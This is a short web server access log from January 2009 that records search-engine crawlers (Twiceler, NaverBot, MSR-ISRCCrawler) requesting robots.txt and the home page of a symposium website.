38.99.13.124 - - [07/Jan/2009:12:21:27 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
114.111.36.26 - - [07/Jan/2009:13:31:12 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
114.111.36.26 - - [07/Jan/2009:13:31:28 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" 0 www.geil-symposium.com
131.107.65.41 - - [07/Jan/2009:15:15:20 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "MSR-ISRCCrawler" 0 www.geil-symposium.com
131.107.65.41 - - [07/Jan/2009:15:15:39 -0500] "GET / HTTP/1.1" 200 326 "-" "MSR-ISRCCrawler" 0 www.geil-symposium.com
